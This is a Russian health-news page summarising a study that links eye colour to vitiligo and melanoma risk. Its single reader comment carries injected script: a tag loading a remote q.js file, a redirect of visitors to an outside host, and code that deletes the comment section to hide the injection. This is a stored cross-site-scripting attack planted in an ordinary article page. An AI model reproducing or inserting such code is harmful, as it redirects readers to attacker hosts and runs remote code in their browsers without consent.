Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Может ли у вас развиться ...  >>  Может ли у вас развиться рак? Это зависит от того, какого цвета ваши глаза
 
Обратная связь
 

Может ли у вас развиться рак? Это зависит от того, какого цвета ваши глаза

Размер шрифта
15 июня 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

У людей с карими глазами чаще развивается витилиго, а у голубоглазых – самая опасная форма рака – меланома: говорят результаты исследования.

Что такое витилиго

Витилиго – это аутоиммунное заболевание, при котором иммунная система начинает атаковать здоровые пигментные клетки. В результате на коже появляются белые пятна – участки, лишенные пигмента меланина.

Люди, страдающие витилиго, имеют повышенный риск развития других аутоиммунных заболеваний: аутоиммунного тиреоидита, сахарного диабета 1 типа, ревматоидного артрита и системной красной волчанки.

Что такое меланома

Меланома развивается из пигментных клеток, содержащих меланин, и является самой опасной формой рака кожи. Опасность этой злокачественной опухоли заключается в том, что она часто рецидивирует и дает метастазы практически во все органы и ткани. Процесс метастазирования представляет собой распространение опухолевых клеток по лимфатическим и кровеносным сосудам.

Данные исследования

В исследовании приняли участие 450 людей с витилиго и 3 200 здоровых людей (группа сравнения). В процессе проведения исследования ученые обнаружили 13 новых генов, наличие которых предрасполагает к развитию витилиго. Полученные результаты свидетельствуют о том, что витилиго чаще развивается у людей с карими глазами, чем у людей с голубыми или серыми глазами.

Ученые считают, что нарушение иммунного ответа, которое наблюдается при витилиго, снижает риск развития меланомы.

– Мы считаем, что витилиго – это защитный процесс, с помощью которого иммунная система находит и разрушает клетки меланомы на ранних стадиях развития, – рассказывает Ричард Шпритц (Richard Spritz) из Медицинской школы Университета Колорадо (University of Colorado School of Medicine). – Когда у нас будет больше информации о генах, которые предрасполагают к развитию витилиго, мы сможем получить данные о генах, отвечающих за развитие аутоиммунных заболеваний и меланомы.

Результаты исследования опубликованы в журнале Nature Genetics.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Какой рост у женщины, такими болезнями и болеет   Признаки рака, которые вы игнорируете   Голубоглазые красавцы в опасности!   Как не потерять мужа?  
25 июня 2013Компании, производящие краски для волос, разоряются! Изобретено лекарство против седины 11 сентября 2012Солнечные ожоги снижают риск рака кожи!
 
21 августа 2012Бородавки и рак кожи взаимосвязаны! 14 августа 2012Средство от меланомы скрыто в нашем иммунитете!
 

Слайдшоу

1
Как дата рождения повлияет на вашу жизнь Темная сторона солнца! Чем оно опасно?
Не показывайте мужчинам ноги – они выдадут все ваши секреты! Как улучшить результаты анализов. Часть 2
Что должно насторожить в поведении мужа? Вы даже не догадываетесь, что у вас рак кожи!
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.